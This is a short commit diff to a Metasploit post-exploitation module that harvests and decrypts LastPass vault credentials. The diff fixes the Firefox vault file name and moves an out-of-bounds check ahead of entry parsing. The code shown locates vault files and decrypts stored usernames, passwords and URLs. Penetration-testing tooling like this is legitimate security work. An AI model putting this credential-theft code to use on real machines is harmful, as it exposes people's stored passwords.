Undo path and move the out of bound check

modules/post/multi/gather/lastpass_creds.rb

@@ -404,7 +404,7 @@ class Metasploit3 < Msf::Post
           if browser.match(/Firefox|IE/)
             if browser == "Firefox"
               iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr"
-              vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml"
+              vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml"
             else # IE
               iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr"
               vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml"
@@ -709,17 +709,17 @@ class Metasploit3 < Msf::Post
     labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"]
     vault_data = []
     for label in labels
+      if chunk[pointer..pointer + 3].nil?
+        # Out of bound read
+        return nil
+      end
+
       length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16)
       encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1]
       label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*")
       decrypted_data = "" if decrypted_data.nil?
       vault_data << decrypted_data if (label == "url" || label == "username" || label == "password")
       pointer = pointer + 4 + length
-
-      if chunk[pointer..pointer + 3].nil?
-        # Out of bound read
-        return nil
-      end
     end
 
     return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes